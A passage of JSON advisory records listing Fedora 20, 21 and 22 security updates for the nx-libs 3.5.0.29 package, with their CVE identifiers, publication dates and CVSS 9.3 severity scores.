nxagent/x2goagent. ", "modified": "2015-03-26T21:29:40", "published": "2015-03-26T21:29:40", "id": "FEDORA:A5A9D608A4BC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: nx-libs-3.5.0.29-1.fc20", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2895", "CVE-2011-4028", "CVE-2013-4396", "CVE-2013-6462", "CVE-2014-0209", "CVE-2014-0210", "CVE-2014-0211", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8099", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2015-0255"], "description": "NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one. This package provides the core nx-X11 libraries customized for nxagent/x2goagent. ", "modified": "2015-03-21T04:53:26", "published": "2015-03-21T04:53:26", "id": "FEDORA:593706093B2E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: nx-libs-3.5.0.29-1.fc22", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2895", "CVE-2011-4028", "CVE-2013-4396", "CVE-2013-6462", "CVE-2014-0209", "CVE-2014-0210", "CVE-2014-0211", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8099", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2015-0255"], "description": "NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one. This package provides the core nx-X11 libraries customized for nxagent/x2goagent. ", "modified": "2015-03-26T21:51:39", "published": "2015-03-26T21:51:39", "id": "FEDORA:A13DB60C7030", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: nx-libs-3.5.0.29-1.fc21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}